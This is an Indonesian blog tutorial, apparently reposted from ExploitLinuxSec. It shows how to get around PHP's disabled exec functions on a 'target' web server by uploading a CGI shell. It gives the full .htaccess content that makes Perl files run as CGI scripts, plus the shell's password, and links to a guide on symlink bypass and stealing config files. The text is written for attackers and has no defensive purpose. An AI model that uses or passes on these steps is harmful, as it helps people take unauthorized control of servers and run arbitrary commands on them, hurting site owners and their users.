Pernah gak nemu server yang disabled functionnya banyak banget.
Yang paling parah kalau fungsi exec nya di disable.
Di beberapa server “tua” bisa di bypass dengan trik add php.ini dan menambahkan value disable function ke “off”. Sayangnya di server sekarang trik bypass seperti itu kadang tidak berjalan.
Nah kita bisa membypass nya dengan CGI Shell.
DOWNLOAD DISINI
Nah selanjutnya upload shell tersebut di web target.
Biar gampang buat direktori baru aja lalu upload shell cgi nya disitu.
Selanjutnya buat file htaccess di folder tempat cgi shell tadi dan isinya :
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddType application/x-httpd-cgi .pl
AddHandler server-parsed .php
AddHandler cgi-script .pl
AddHandler cgi-script .pl
Setelah itu buka shell nya.
Masukkan password : jkt48
Sekarang kalian bisa menjalankan perintah linux seperti biasa meskipun shell exec di disable.
Sebagai Referensi kalian bisa membaca artikel cara bypass Symlink & Grab Config disini
http://www.magelang1337.com/2017/12/tutorial-bypass-symlink-grab-config.html
Sekian Semoga Bermanfaat.. Sampai ketemu di tutorial selanjutnya
SUMBER : ExploitLinuxSec